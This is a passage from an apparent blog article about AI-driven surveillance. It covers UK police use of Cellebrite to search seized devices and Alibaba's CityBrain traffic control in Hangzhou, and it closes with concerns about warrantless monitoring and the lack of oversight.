image of his fingerprint. From that, forensic scientists used by UK police, confirmed that officers had arrested the correct person and associated him with drugs. AI solutions to speed up evidence processing including scanning laptops and phones UK police forces are trying out AI software to speed up processing evidence from digital devices. A dozen departments around the UK are using software, called Cellebrite, which employs AI algorithms to search through data found on devices, including phones and laptops. Cellbrite can recognize images that contain child abuse, accepts feeds from multiple devices to see when multiple owners were in the same physical location at the same time and can read text from screenshots. Officers can even feed it photos of suspects to see if a picture of them show up on someone’s hard drive. China takes the surveillance biscuit and may show us a glimpse of the future There are 600 million mobile phone users in China, each producing a great deal of information about their users. China has a notorious record of human rights abuses and the ruling Communist Party takes a controlling interest (a board seat) in many of their largest technology companies, to ensure the work done is in the interest of the party as well as profitable for the corporate. As a result, China is on the front foot when it comes to both AI and surveillance technology. China’s surveillance tools could be a harbinger of the future in the Western world. Chinese cities will be run by a private company Alibaba, China’s equivalent of Amazon, already has control over the traffic lights in one Chinese city, Hangzhou. Alibaba is far from shy about it’s ambitions. It has 120,000 developers working on the problem and intends to commercialise and sell the data it gathers about citizens. The AI based product they’re using is called CityBrain. In the future, all Chinese cities could well all be run by AI from the Alibaba corporation the idea is to use this trial as a template for every city. The technology is likely to be placed in Kuala Lumpur next. In the areas under CityBrain’s control, traffic speeds have increased by 15% already. However, some of those observing the situation have expressed concerns not just about (the lack of) oversight on CityBrain’s current capabilities but the potential for future abuse. What to make of this incredible list of surveillance capabilities Facilities like Mapquest’s new mapping service are beguiling. They’re clever ideas which create a better works. Similar technology, however, behind the scenes, is being adopted by law enforcement bodies in an ever growing list of countries. Even for someone who understands cutting edge technology, the sum of those facilities may be surprising. Literally any aspect of your behaviour, from the way you walk, to your face, your heatmap and, of course, the contents of your phone and laptops can now be monitored. Law enforcement can access and review information feeds with Artificial Intelligence software, to process and summarise findings quickly. In some cases, this is being done without the need for a warrant. Concerningly, these advances seem to be coming without policy or, in many cases any form of oversight. We must change how we think about AI, urge AI founding fathers  
Read more
  • 0
  • 0
  • 25733